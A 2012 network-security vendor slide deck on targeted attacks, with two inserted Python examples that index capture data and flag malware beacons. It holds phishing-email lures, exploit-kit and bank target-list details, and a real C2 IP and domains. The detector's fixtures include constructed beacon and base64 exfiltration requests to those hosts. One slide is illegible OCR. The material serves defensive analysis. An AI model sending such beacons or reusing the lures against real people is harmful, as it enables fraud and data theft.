6/1/2012 



Solera Networks
See everything. Know everything.™

Preparing for the Inevitable: 

How to Fight Advanced Targeted Attacks 

with Security Intelligence and Big-Data Analytics 



Andrew Brandt 

Director of Threat Research 




© 2012 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written consent is strictly prohibited.









Big Data 


Little attacks 




Andrew Brandt 

Director of Threat Research 







Who I am and what I do

• Former journalist
• Self-taught security enthusiast
• Malware analyst
• Network security researcher
• If you code, distribute, or use malware for gain, prepare for maximum mockery and humiliation.

I couldn't have said it better myself

[Screenshot: the little-known "mea culpa" feature of Blackshades RAT]

@SoleraBlog #AusCERT12





Why so touchy

[Screenshot: a page titled "Welcome to the Threat Blog"]

A little too close to home?

Today's Persistent, Blended Threats



Communication
• Social engineering
• Convince victim to do something
  • Visit web page
  • Download file
• Execute binary

Exploitation
• Enumerate surface
• Exploit vulnerability
• Infiltrate system
• Maintain connectivity

Propagation
• Spread to other systems
• Expand attack footprint
• Adapt to countermeasures

The Challenge of Keeping Pace.



54% of breaches involved customized malware (no signature available at the time of exploit) (VzB/USSS)

87% of records stolen were stolen using Highly Sophisticated Attacks (VzB/USSS)

$7.2M was the average cost of a data breach in 2011 (Ponemon)

Big Data Landscape - Security Intelligence & Analytics



"Context-aware and adaptive security will be the only way to securely support the dynamic business and IT infrastructures emerging during the next 10 years."

—Neil MacDonald, VP & Fellow, Gartner

What does this stuff look like when it's happening?

Would this convince you to click?



[Screenshot: phishing email. From: "Credit Check" <info@medicareaccept.com>; Subject: "Your TransUnion, Equifax, and Experian credit scores may have changed"; Date: Tue, 4 Oct 2011]

[Screenshot: spam email. Subject: "FWD: Look what i found!"; Date: Wed, 26 Oct 2011. "Hi friend." followed by a rambling pitch and a link that passes through a .ru redirector to a "bizopp" page]

[Screenshot: order confirmation email addressed to Joe Levy: "Thank you for shopping with YesAsia.com ... To view details of your order go to:" a link on a yesasia-invoices.com lookalike domain; Order Number Y4C20111010C34, Payment Method Credit Card, Shipping Method Express, Number of Suggested Shipment(s) 1]

Reply to the IRS.




[Screenshot: IRS-themed phishing email, illegible in this scan]

Seriously

What about one of these




[Screenshot: phishing email. From: "::Better Business Bureau::"; Date: Wed, 7 Dec 2011; Subject: "BBB Complaint Activity Report"; "Attn: Owner/Manager". The body claims a complaint has been filed by one of your associates concerning their business relations with you, says the details are explained in the enclosed file, and reads "We encourage you to click here to answer this complaint", signed Council of Better Business Bureaus, 4200 Wilson Blvd, Suite 800, Arlington, VA 22203]

Yeah, it's malicious

[Screenshot: the same email with the "click here" link annotated as a drive-by download]

Indistinguishable from normal email



[Screenshot: genuine YesAsia.com order confirmation email: "Thank you for shopping with YesAsia.com ... Your order has been successfully placed", with order number, payment method (credit card), shipping method (express), number of suggested shipments (1), an item list including a Freecom external hard drive, and totals in USD]

...until it isn't, anymore.



[Screenshot: the order confirmation sent to Joe Levy on Monday, October 10, 2011, subject "YesAsia.com Order Confirmation #Y4C20111010C34": the same wording, order number, payment and shipping details, and an item list (Logitech QuickCam Ultra Vision, Freecom external hard drive) with USD totals]

Cyber Attacks Accelerate.



"Operation 

Aurora" 
Google 



M 



juniper 




rnckspoze 



Jan '10 



Diplomatic Cables 




fi 



VIM 



HB>Gary 



Cltl 




{NintendoJ wf 



PBS ^W"' 




nT =-^i futpa 







ustPassoxa 

-■ II W I F^.1 Fir t—wi 



M 



«dNY HMti 
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The Malware Problem - Overwhelming Odds 

"With security researchers now uncovering 
close to 100,000 new malware samples a day, 
the time and resources needed to conduct 
deep, human analysis on every piece of 
malware has become overwhelming." 

-GTISC Emerging Cyber Threats Report 2011 
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Record everything, 24/7 



• Timely analysis and insight into every packet entering or leaving your network
• … and flows from L2 - L7
• … exfiltration and malware infiltration
• … situational awareness
• … enrichment and big data warehousing
• Flexible, open and easy-to-use platform

Multiple Levels of Indexing



Packet Capture and Repository (DSFS)
• Full fidelity, full payload streaming capture
• Capable of 10s of Gb/s data storage
• Support for simultaneous readers and writers
• Maximum throughput via smart streaming writes and reads



Solera DB Index
• SoleraDB - middle layer contains the data necessary to find and reconstruct packets, flows, and entire network sessions in perfect fidelity
• Handles millions of IOPS on a single appliance
• Used as a "quick rejection" for the Packet Capture and Repository



Solera DB Bitmask & Hash
• Per-attribute quick lookup layer
• Takes milliseconds to accept/reject hundreds of MBs of capture data
• Search queries are processed using a proprietary algorithm that generates hash values used by the top layer of the search engine to quickly determine which 64MB chunks the data are in
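As an added illustration of what such a quick-rejection layer does (this is not Solera's code, and the proprietary algorithm on the slide is not public), here is a per-chunk, per-attribute bitmask index in Python: records land in fixed-size chunks, every chunk keeps one bitmask per attribute, a query value is hashed to a few bit positions, and only chunks whose mask already contains all of those bits are read from the repository. Chunk size, mask width, hash count and the metadata records are constructed for the demo.

```python
"""Added example, not Solera's code: a per-chunk, per-attribute bitmask index
that decides by one mask comparison whether a capture chunk can contain a
value, so only candidate chunks are ever read from the repository.
Chunk size, mask width and the sample records are constructed for the demo."""
import hashlib
from collections import defaultdict

MASK_BITS = 256    # bits per (chunk, attribute) mask; assumption, tiny for the demo
HASH_COUNT = 3     # bit positions set per indexed value


def bit_positions(value: str):
    """Derive HASH_COUNT positions from disjoint 32-bit slices of one digest."""
    digest = hashlib.blake2b(value.encode("utf-8"), digest_size=4 * HASH_COUNT).digest()
    return [int.from_bytes(digest[4 * i:4 * i + 4], "big") % MASK_BITS
            for i in range(HASH_COUNT)]


def value_mask(value: str) -> int:
    mask = 0
    for pos in bit_positions(value):
        mask |= 1 << pos
    return mask


class ChunkIndex:
    """Stores records in fixed-size chunks and keeps one bitmask per
    (chunk, attribute). A query compares masks first and reads records
    only from chunks whose mask contains every bit of the query value."""

    def __init__(self, chunk_size: int):
        self.chunk_size = chunk_size
        self.chunks = []                  # list of chunks, each a list of records
        self.masks = defaultdict(dict)    # chunk id -> {attribute: bitmask}

    def add(self, record: dict) -> None:
        if not self.chunks or len(self.chunks[-1]) >= self.chunk_size:
            self.chunks.append([])
        cid = len(self.chunks) - 1
        self.chunks[cid].append(record)
        for attr, value in record.items():
            self.masks[cid][attr] = self.masks[cid].get(attr, 0) | value_mask(value)

    def candidate_chunks(self, attr: str, value: str):
        """Quick rejection: a chunk missing any bit of the value cannot hold it
        (no false negatives); a chunk with all bits set may still be a false positive."""
        needed = value_mask(value)
        return [cid for cid in range(len(self.chunks))
                if self.masks[cid].get(attr, 0) & needed == needed]

    def search(self, attr: str, value: str):
        """Return (matching records, chunks actually read, chunks in total)."""
        candidates = self.candidate_chunks(attr, value)
        hits = [r for cid in candidates for r in self.chunks[cid] if r.get(attr) == value]
        return hits, len(candidates), len(self.chunks)


# Constructed metadata records (the http -> server / uri / user_agent attributes)
SAMPLE_RECORDS = [
    {"server": f"host{i}.example.net", "uri": f"/page{i}.html", "user_agent": "Mozilla/5.0"}
    for i in range(12)
] + [
    {"server": "play-support-email.com", "uri": "/dir_vc.php", "user_agent": "beacon/1.0"},
]


def build_demo_index() -> ChunkIndex:
    index = ChunkIndex(chunk_size=4)     # 13 records -> 4 chunks
    for record in SAMPLE_RECORDS:
        index.add(record)
    return index


if __name__ == "__main__":
    idx = build_demo_index()
    hits, read, total = idx.search("server", "play-support-email.com")
    print(f"{len(hits)} match(es); read {read} of {total} chunks")
```

The mask size here is deliberately small; a production layer would size the mask per chunk so that the false-positive rate stays low, since every false positive costs a full read of a 64MB chunk.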
Metadata Attribute Mappings



aim_express -> login
aim -> filename
aim -> login
aim_transfer -> filename
bittorrent -> filename
dns -> query
ebay -> query_raw
ebuddy -> nickname
edonkey -> filename
edonkey -> login
edonkey -> query
facebook -> login
facebook_mail -> email
facebook_mail -> receiver_email
facebook_mail -> sender_email
facebook_mail -> subject
facebook -> name
facebook -> query_raw
facebook -> sender_email
friendster -> login
ftp -> filename
ftp -> login
gmail -> attach_filename
gmail_basic -> attach_filename
gmail_basic -> login
gmail_basic -> receiver_email
gmail_basic -> sender_email
gmail_basic -> subject
gmail_chat -> callee
gmail_chat -> caller
gmail_chat -> login
gmail -> login
gmail_mobile -> login
gmail_mobile -> receiver_email
gmail_mobile -> sender_email
gmail_mobile -> subject
gmail -> receiver_email
gmail -> sender_email
gmail -> subject
gnutella -> filename
gnutella -> query
google_groups -> login
google_groups -> member_alias
google_maps -> query_raw
google -> query_raw
h225 -> callee
h225 -> caller
http -> filename
http -> mime_type
http -> part_filename
http -> referer
http -> server
http -> uri
http -> uri_full
http -> user_agent
imap -> attach_filename
imap -> login
imap -> mime_type
imap -> receiver_email
imap -> sender_email
imap -> subject
irc -> login
irc -> nickname
jabber -> callee
jabber -> caller
jabber -> filename
jabber -> login
jabber -> nickname
kazaa -> filename
kazaa -> login
kazaa -> mime_type
linkedin -> login
linkedin -> receiver_email
linkedin -> sender_email
linkedin -> subject
live_hotmail -> attach_filename
live_hotmail -> login
live_hotmail -> receiver_email
live_hotmail -> sender_email
live_hotmail -> subject
livemail_mobile -> login
livemail_mobile -> receiver_email
livemail_mobile -> sender_email
livemail_mobile -> subject
lotusnotes -> attach_filename
lotusnotes -> receiver_email
lotusnotes -> sender_email
lotusnotes -> subject
mapi -> login
msn -> callee
msn -> caller
msn -> filename
msn -> login
msn_search -> query_raw
myspace -> login
myspace -> name
myspace -> query_raw
mysql -> query
nfs -> filename
owa -> attach_filename
owa -> login
owa -> receiver_email
owa -> sender_email
owa -> subject
pop3 -> attach_filename
pop3 -> login
pop3 -> mime_type
pop3 -> receiver_email
pop3 -> sender_email
pop3 -> subject
postgres -> query
radius -> login
rapidshare -> filename
rapidshare -> login
sccp -> callee
sccp -> caller
sip -> callee
sip -> caller
sip -> mime_type
smb -> filename
smb -> login
smtp -> attach_filename
smtp -> login
smtp -> mime_type
smtp -> receiver_email
smtp -> receiver_rcptto
smtp -> sender_email
smtp -> sender_mailfrom
Meanwhile... CVE 2011-3544 Javasploit



[Screenshot: decoy page reading "You are redirecting... Please wait page is loading..." shown while the Java exploit runs]

[Screenshot: process list captured on the victim: firefox.exe, java.exe (launched with -Djvm_launched=... -Xbootclasspath...), plugin-container.exe (--channel=1980...), regsvr32.exe invoked with -s to silently register a DLL (wpbt0.dll) dropped under the user's Local Settings folder, and cmd.exe running the Java payload's self-delete batch script]

[Screenshot: "Java(TM) Platform, Standard Edition" dialog: "Visit us for more information at: http://www.java.com"]
Most Dreaded Questions from the CISO

Who did this to us - and how?
How long has this been going on?
What did we lose, and when?
Is it over yet?
Can we be sure it won't happen again?

Breaches Happen
Deal With It.

See what you did the…



[Screenshot: Solera capture view of a Blackhole Exploit Kit session, listing the landing page, redirect and payload transfers in order, largely illegible in this scan]

"Classic" Blackhole Exploit Kit behavior, malware payload delivered at the end

Reputation Information



Host IP: 192.168.0.2
Number of Incidents: 417
Last Seen Date: 2012-01-18

VirusTotal for 7d1326add2b0f72dbba5a1211f6aafi27
McAfee: SWF/Exploit-Blacole
NOD32: SWF/Exploit.CVE-2011-0611.A
Avast: SWF:Dropper [Heur]
Kaspersky: Exploit.SWF.CVE-2011-0611.bu
BitDefender: Trojan.Exploit.ANTG
Sophos: Troj/SWFExp-AJ
Comodo: UnclassifiedMalware
F-Secure: Trojan.Exploit.ANTG
McAfee-GW-Edition: SWF/Exploit-Blacole
Emsisoft: SWF.Dropper!IK
Microsoft: Exploit:SWF/Blacole.S
GData: Trojan.Exploit.ANTG
Ikarus: SWF.Dropper
Fortinet: W32/SWFExp.AJ!tr

Reputation sources: VirusTotal, ClamAV, SORBS, Robtex, SANS ISC, Google SafeBrowse

Real-Time Extractor: Malware at the speed of light



Delivering file-level alerting and malware analysis — at the network layer — to any enterprise

[Diagram: SMTP, FTP and HTTP traffic feeding the extractor]

• Policy-based: protocol, country, MIME-type, file extension, etc.
• Continuous detection of all network traffic — analyze, index, alert
• Alert-triggered analysis — PDF, .js, PE, Flash, JAR, OLE, .apk, etc.
• Collapse the distributed network — leverage core security infrastructure

What's in your pingback?

When malware phones home:

Exfiltrates sensitive data
• Extracted email addresses
• Other documents

Receives
• Instructions
• Links to payloads
• Poison pill self-deletion command

Parameter   Parameter value   Destination host
key         @ya4c34           173.231.2.194 [play-support-email.com]
pcuser      Research          173.231.2.194 [play-support-email.com]
pcname      SPIKE             173.231.2.194 [play-support-email.com]
hwid        9C3B4DCG          173.231.2.194 [play-support-email.com]
country     United States     173.231.2.194 [play-support-email.com]
key         @ya4c34           173.231.2.194 [play-support-email.com]

Zbot/Spyeye Target List



[Artifact preview (text view): partial web-inject target list; URL patterns for business online-banking portals, among them bankofamerica.com, bankofthewest.com, bbt.com, jpmorgan.com, usbank.com, wamu.com, citibank.com, calbanktrust.com, firsttennessee.biz, compassbank.com and others, largely illegible in this scan]

Partial target list, downloaded by Trojan.

Domains include those of banks that service business customers. Targets vary based on the victim's location in the world.

One mistaken click, by the wrong employee, can bankrupt a corporation!

When malware phones home

Some RATs or phishing Trojans don't bother to hide their activity

[Artifact preview (hex and text view): HTTP request to www.playpayment.com/backup/index.php; the only concealment is to obfuscate the data with base64 (the dump ends in a base64 string terminating in "NvbQA=")]

Revealed, you are by your weird User-Agent




[Artifact preview: HTTP GET request to Host: play-support-email.com carrying the bot's key and pcname parameters in the query string, with a User-Agent header no browser would send]
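The three slides above (the http attribute mappings, the pingback parameter table and the give-away User-Agent) describe what an analyst looks for in captured HTTP metadata. As an added example, not Solera's code, the Python below extracts the http -> server / uri / uri_full / user_agent / referer attributes from a raw request and then applies those tells: two or more of the host-fingerprint parameters from the slide's table (key, pcuser, pcname, hwid, country), a User-Agent outside a small browser allow-list, and parameter values that decode as base64 text (the playpayment.com case). The requests, the User-Agent string and the allow-list are constructed; the parameter names and the hosts play-support-email.com and www.playpayment.com come from the slides.

```python
"""Added example, not Solera's code: HTTP metadata extraction plus the
pingback heuristics the slides describe. All requests are constructed."""
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qsl, urlencode

# Parameter names the slide's pingback table shows the bot reporting to its C2.
FINGERPRINT_PARAMS = {"key", "pcuser", "pcname", "hwid", "country"}
# Allow-list of User-Agent prefixes treated as ordinary (assumption for the demo).
KNOWN_UA = re.compile(r"^(Mozilla/\d|Opera/|curl/|Wget/)")


def extract_http_metadata(raw: str) -> dict:
    """Parse one raw HTTP request into the attributes the index would store."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update(parse_qsl(body, keep_blank_values=True))  # POST form fields count too
    return {
        "method": method,
        "server": headers.get("host", ""),
        "uri": parts.path,
        "uri_full": target,
        "user_agent": headers.get("user-agent", ""),
        "referer": headers.get("referer", ""),
        "params": params,
    }


def maybe_base64(value: str):
    """Decode value if it is well-formed base64 yielding printable ASCII, else None."""
    if len(value) < 8 or len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", value):
        return None
    try:
        decoded = base64.b64decode(value, validate=True)
    except binascii.Error:
        return None
    text = decoded.rstrip(b"\x00")   # the slide's dump ends in a NUL-terminated string
    if text and all(32 <= b < 127 for b in text):
        return text.decode("ascii")
    return None


def assess_pingback(meta: dict) -> dict:
    """Score one request's metadata against the phone-home tells."""
    reasons = []
    fingerprint = FINGERPRINT_PARAMS & set(meta["params"])
    if len(fingerprint) >= 2:
        reasons.append("host-fingerprint parameters: " + ", ".join(sorted(fingerprint)))
    if not KNOWN_UA.match(meta["user_agent"]):
        reasons.append("non-browser User-Agent %r" % meta["user_agent"])
    decoded = {}
    for name, value in meta["params"].items():
        text = maybe_base64(value)
        if text is not None:
            decoded[name] = text
    if decoded:
        reasons.append("base64-obfuscated parameter values")
    return {"server": meta["server"], "suspicious": bool(reasons),
            "reasons": reasons, "decoded": decoded}


# Constructed requests (CRLF-delimited as on the wire).
BENIGN_REQUEST = (
    "GET /news/index.html?id=42 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0\r\n"
    "Referer: http://www.example.com/\r\n\r\n")
BEACON_REQUEST = (
    "GET /dir_vc.php?key=%40ya4c34&pcuser=Research&pcname=SPIKE&hwid=9C3B4DCG"
    "&country=United+States HTTP/1.1\r\n"
    "Host: play-support-email.com\r\n"
    "User-Agent: pingback 1.0\r\n\r\n")    # constructed UA; the slide's is not legible
EXFIL_VALUE = base64.b64encode(b"mailbox=joe@example.com").decode()   # constructed
EXFIL_REQUEST = (
    "POST /backup/index.php?action=upload HTTP/1.1\r\n"
    "Host: www.playpayment.com\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    + urlencode({"data": EXFIL_VALUE}))


def triage(raw: str) -> dict:
    return assess_pingback(extract_http_metadata(raw))


if __name__ == "__main__":
    for raw in (BENIGN_REQUEST, BEACON_REQUEST, EXFIL_REQUEST):
        print(triage(raw))
```

Each heuristic on its own is weak (plenty of legitimate software sends an odd User-Agent, and base64 appears in ordinary web traffic); the value is in keeping the extracted attributes indexed so that, once one beacon is confirmed, the same server, uri or user_agent can be searched across the whole capture history.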
Collecting Decrypted SSL Traffic



In partnership with Netronome

[Diagram: Web Browser (SSL Client) -> Transparent SSL Proxy -> Solera DS Appliance. The proxy and the appliance share common control/management; decrypted traffic is captured by the appliance. Legend: Non-SSL, SSL]

• 100% encrypted traffic decrypted, captured, classified and indexed
• Protects against SSL-encrypted bot traffic or confidential information leakage

Decrypted SSL Zbot/Cridex Pingback




[Artifact preview of the decrypted pingback (text and hex view): username "unknown", a probable GUID, the injected process (Explorer.EXE) and the pcname [SPIKE] followed by the hwid prefix 9C...]

Every 5-60 seconds, the bot sends this SSL-encrypted packet to its CnC server.

"I'm still here. Ready for orders."
We know where you are, malware guys



"Invest in …, not in prediction"

-Nassim Taleb, The Black Swan

Thank You





blog.soleranetworks.com
http://j.mp/bigdata_auscert

@SoleraBlog
facebook.com/soleranetworks